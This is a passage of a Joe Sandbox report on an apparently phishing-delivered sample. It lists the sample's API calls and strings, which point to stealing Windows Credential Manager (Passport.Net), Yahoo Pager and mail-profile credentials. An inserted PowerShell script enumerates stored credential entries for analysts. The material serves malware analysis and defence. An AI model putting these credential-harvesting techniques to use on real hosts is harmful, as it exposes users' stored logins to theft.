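Fed the whole report text instead of SAMPLE, parse_records yields one Record per function block; index_by_opcode joins records from two reports on their Opcode ID, whose exact definition is Joe Sandbox's and not stated on this page. The tags describe what the dumped code is able to do, not which family it belongs to: legitimate NSS libraries and password-recovery utilities carry the same key3.db entry names, so treat a tag as capability evidence for this dump and read it together with the sandbox's own signatures.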

APIs
• ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                                                                          • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                          • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                                            • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset$strlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2142929671-0
                                                                                                                                                                                                                                          • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                          • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                                                          APIs
• _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408E31
  • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
• strlen.MSVCRT ref: 00408E4F
• LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
• memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76940A60), ref: 00408EBE
  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D5C
  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D7A
  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D98
  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408DA8
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
• String ID: strings
• API String ID: 4036804644-3030018805
• Opcode ID: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
• Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
• Opcode Fuzzy Hash: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
• Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
APIs
  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
• strlen.MSVCRT ref: 0040F7BE
• _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
• LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Passport.Net\*
• API String ID: 2329438634-3671122194
• Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
• Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
• Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
• Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
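Added example, not part of the Joe Sandbox report and not code from the sample: the function above resolves CredEnumerateA/W, CredReadA, CredDeleteA and CredFree from advapi32.dll at run time and enumerates the Windows Credential Manager with the filter Passport.Net\*, the target-name prefix under which Windows stored Passport / Windows Live logons (the pattern used by MSN Messenger password-recovery tools). The PowerShell below calls the same CredEnumerateW / CredFree pair through P/Invoke with that filter, so an analyst can see on a suspect host which entries the sample would have been able to read. It is read-only and lists only target, user name, credential type and blob size; it does not decode CredentialBlob and does not wrap CredDeleteA. Assumptions: Windows PowerShell 5.1 or later on Windows, the documented CREDENTIALW layout and CredEnumerateW signature; the class name CredMgr, the helper Enumerate and the function Get-StoredCredentialSummary are mine.

```powershell
# Added example (not from the Joe Sandbox report): read-only enumeration of
# Credential Manager entries matching the sample's filter "Passport.Net\*".
$src = @'
using System;
using System.Runtime.InteropServices;

public static class CredMgr {
    // Field order and types follow the documented CREDENTIALW structure.
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct CREDENTIAL {
        public uint Flags;
        public uint Type;
        public IntPtr TargetName;
        public IntPtr Comment;
        public System.Runtime.InteropServices.ComTypes.FILETIME LastWritten;
        public uint CredentialBlobSize;
        public IntPtr CredentialBlob;
        public uint Persist;
        public uint AttributeCount;
        public IntPtr Attributes;
        public IntPtr TargetAlias;
        public IntPtr UserName;
    }

    [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool CredEnumerateW(string filter, uint flags, out uint count, out IntPtr credentials);

    [DllImport("advapi32.dll")]
    public static extern void CredFree(IntPtr buffer);

    // Returns one {TargetName, UserName, Type, CredentialBlobSize} row per entry.
    // The blob itself is deliberately not read.
    public static string[][] Enumerate(string filter) {
        uint count; IntPtr pCreds;
        if (!CredEnumerateW(filter, 0, out count, out pCreds)) {
            int err = Marshal.GetLastWin32Error();
            if (err == 1168) return new string[0][];   // ERROR_NOT_FOUND: no entry matches
            throw new System.ComponentModel.Win32Exception(err);
        }
        try {
            var result = new string[count][];
            for (int i = 0; i < count; i++) {
                // CredEnumerateW returns an array of PCREDENTIALW pointers.
                IntPtr p = Marshal.ReadIntPtr(pCreds, i * IntPtr.Size);
                var c = (CREDENTIAL)Marshal.PtrToStructure(p, typeof(CREDENTIAL));
                result[i] = new string[] {
                    Marshal.PtrToStringUni(c.TargetName),
                    Marshal.PtrToStringUni(c.UserName),
                    c.Type.ToString(),
                    c.CredentialBlobSize.ToString()
                };
            }
            return result;
        } finally {
            CredFree(pCreds);   // one CredFree releases the array and every entry in it
        }
    }
}
'@
Add-Type -TypeDefinition $src

# Hypothetical wrapper name; the default filter is the one observed in the sample.
function Get-StoredCredentialSummary {
    param([string]$Filter = 'Passport.Net\*')
    foreach ($e in [CredMgr]::Enumerate($Filter)) {
        [pscustomobject]@{
            Target    = $e[0]
            User      = $e[1]
            Type      = [int]$e[2]     # 1 = CRED_TYPE_GENERIC, 2 = CRED_TYPE_DOMAIN_PASSWORD, ...
            BlobBytes = [int]$e[3]
        }
    }
}

Get-StoredCredentialSummary
```

Running this in the context of the logged-on user shows the same set of entries the sample's CredEnumerateA/W call would return for that user; an empty result (ERROR_NOT_FOUND) means the filter matched nothing on that host. Because the sample additionally resolves CredDeleteA, compare the listing against a known-good baseline rather than assuming an empty result means nothing was ever stored.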
APIs
  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
• memset.MSVCRT ref: 0040330B
• GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
• strchr.MSVCRT ref: 0040335A
  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
• strlen.MSVCRT ref: 0040339C
  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858
• Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
• Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
• Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
• Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
APIs
• memset.MSVCRT ref: 00444573
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266
• Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
• Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
• Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
• Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
APIs
• GetLastError.KERNEL32(?), ref: 00406D87
• sprintf.MSVCRT ref: 00406DAF
• MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ErrorLastMessagesprintf
• String ID: Error$Error %d: %s
• API String ID: 1670431679-1552265934
• Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
• Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
• Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
• Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                                          • String ID: $no query solution
                                                                                                                                                                                                                                          • API String ID: 368790112-326442043
                                                                                                                                                                                                                                          • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                                                                          • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                          • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                                          • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                                          • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                                          • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                          • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
APIs
• Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
